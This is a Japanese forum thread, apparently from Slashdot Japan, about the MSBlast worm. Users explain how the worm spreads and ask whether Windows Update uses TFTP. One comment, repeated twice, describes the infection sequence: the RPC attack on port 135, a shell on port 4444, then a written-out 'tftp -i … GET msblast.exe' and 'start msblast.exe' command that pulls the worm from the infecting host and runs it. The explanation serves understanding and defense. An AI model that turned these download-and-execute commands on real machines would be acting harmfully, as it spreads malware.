アカウント名:
パスワード:
まず、第一波として感染PCからポート135に攻撃が着ます。RPCの脆弱性がある場合、ワームのコードが実行されポート4444が開かれます。そして第二波として感染PCからポート4444に
tftp -i IPアドレス GET msblast.exe
というテキストデータが着ます。で、最初の第一波のコードがこれをcmd.exeで実行させます。IPアドレスというのは感染して今ワームのコードを送ってきているPCのIPアドレスです。その感染PCではmsblast.exeが動いていて、ポート69で待機しています。tftpが終了するか約20秒経過すると
start msblast.exemsblast.exe
がポート4444に着ます。そこでDownloadされたmsblast.exeが実行されます。それで今度は自分が感染PCになるわけです。
第一波でポート4444が開く前に第二波が着てしまった場合とか、tftpによるmsblast.exeのDownloadが終了する前に約20秒経ってしまったときには失敗します。
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
長期的な見通しやビジョンはあえて持たないようにしてる -- Linus Torvalds
だいじょうぶ? (スコア:0)
ところで、このウィルス、感染ファイルが TFTP ということなのですが、Windows Update って TFTP を使ってるのでしょうか?
ご存じの方教えてください。
Re:だいじょうぶ? (スコア:0)
「感染ファイルが TFTP」ってどういう意味での発言でしょうか?
TFTP.EXEに感染とかそういうこと?
Re:だいじょうぶ? (スコア:1)
> ワームは自身のTFTPサーバ機能を持っており、感染元コンピュータのポート69番を使用してTFTPサーバとして機能します。
だそうなので、msblast.exe自体がtftpサーバで、バ
tftpによる転送の手順 (スコア:2, 参考になる)
まず、第一波として感染PCからポート135に攻撃が着ます。RPCの脆弱性がある場合、ワームのコードが実行されポート4444が開かれます。そして第二波として感染PCからポート4444に
tftp -i IPアドレス GET msblast.exe
というテキストデータが着ます。で、最初の第一波のコードがこれをcmd.exeで実行させます。IPアドレスというのは感染して今ワームのコードを送ってきているPCのIPアドレスです。その感染PCではmsblast.exeが動いていて、ポート69で待機しています。tftpが終了するか約20秒経過すると
start msblast.exe
msblast.exe
がポート4444に着ます。そこでDownloadされたmsblast.exeが実行されます。それで今度は自分が感染PCになるわけです。
第一波でポート4444が開く前に第二波が着てしまった場合とか、tftpによるmsblast.exeのDownloadが終了する前に約20秒経ってしまったときには失敗します。